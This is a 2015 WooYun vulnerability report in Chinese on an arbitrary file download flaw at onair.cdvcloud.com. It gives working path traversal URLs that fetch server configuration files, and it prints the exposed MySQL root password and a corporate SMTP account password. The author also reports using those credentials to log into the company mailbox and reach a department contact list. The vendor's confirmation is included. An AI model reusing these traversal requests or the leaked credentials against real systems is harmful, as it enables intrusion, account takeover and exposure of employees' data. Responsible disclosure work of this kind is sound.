当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094779

漏洞标题:一处任意下载引发的公司通讯录泄露以及数据库泄漏

相关厂商:cdvcloud.com

漏洞作者:

提交时间:2015-02-02 10:17

修复时间:2015-03-19 10:18

公开时间:2015-03-19 10:18

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-02: 细节已通知厂商并且等待厂商处理中
2015-02-02: 厂商已经确认,细节仅向厂商公开
2015-02-12: 细节向核心白帽子及相关领域专家公开
2015-02-22: 细节向普通白帽子公开
2015-03-04: 细节向实习白帽子公开
2015-03-19: 细节向公众公开

简要描述:

新来的厂商,我先来看看吧~

详细说明:

子站:http://onair.cdvcloud.com/
测试下载:

http://onair.cdvcloud.com/download/data/?path=../WEB-INF/web.xml


发现存在任意下载
于是乎,尝试取得路径:

http://onair.cdvcloud.com/download/data/?path=../WEB-INF/classes/applicationContext.xml


找到数据库地址和邮箱地址:

<property name="locations">
<list>
<value>classpath:email.properties</value>
<value>classpath:jdbc.properties</value>
</list>
</property>


尝试下载数据库连接:

http://onair.cdvcloud.com/download/data/?path=../WEB-INF/classes/jdbc.properties


如下:

dbdriver=com.mysql.jdbc.Driver
dburl=jdbc\:mysql\://localhost\:3306/onair?useUnicode\=true&characterEncoding\=utf8
dbuser=root
#dbpassword=1234
dbpassword=zqvideoServer256


下载邮箱链接:

http://onair.cdvcloud.com/download/data/?path=../WEB-INF/classes/email.properties


链接如下:

email.protocol = smtp
email.host = smtp.qiye.163.com
email.port = 25
email.username = service@cdvcloud.com
email.password = cdvcloud123
email.auth = true
email.systemEmail =service@cdvcloud.com


尝试登陆邮箱:

1.jpg


各部门通讯录泄露:

2.jpg


到此为止。

漏洞证明:

如上

修复方案:

给个高RANK吧,然后厂商有没有新年礼物呢??

版权声明:转载请注明来源 @乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-02-02 10:36

厂商回复:

感谢@的反馈 问题确实存在!正在处理。

最新状态:

暂无


漏洞评价:

评论